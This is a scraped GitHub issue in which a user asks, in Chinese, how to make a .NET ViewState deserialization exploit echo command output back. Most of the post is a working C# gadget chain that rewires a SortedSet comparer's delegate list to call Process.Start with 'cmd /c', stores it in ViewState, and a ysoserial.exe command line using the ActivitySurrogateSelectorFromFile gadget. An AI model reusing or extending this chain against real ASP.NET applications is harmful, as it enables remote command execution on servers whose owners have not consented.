Homework-of-C-Language icon indicating copy to clipboard operation
Homework-of-C-Language copied to clipboard

Published 20 hours ago verified publisher icon 3gstudent

师傅,请教一下.NET的问题

Open wpf97 opened this issue 2 years ago • 0 comments

我用以下代码ViewState可以反序列化执行命令。如果想写成回显的话,如ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dll/System.dll;./dll/System.Web.dll"这样,应该如何在Button2_Click类里面实现?谢谢师傅

 protected void Button2_Click(object sender, EventArgs e) {
            Delegate da = new Comparison<string>(String.Compare);
            Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
            IComparer<string> comp = Comparer<string>.Create(d);
            SortedSet<string> set = new SortedSet<string>(comp);
            set.Add("cmd");
            set.Add("/c " + "echo 111>c:\\windows\\temp\\test.txt");

            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
            object[] invoke_list = d.GetInvocationList();
            // Modify the invocation list to add Process::Start(string, string)
            invoke_list[1] = new Func<string, string, Process>(Process.Start);
            fi.SetValue(d, invoke_list);
            ViewState["test"] = set;
    }

wpf97 avatar Jul 18 '22 05:07 wpf97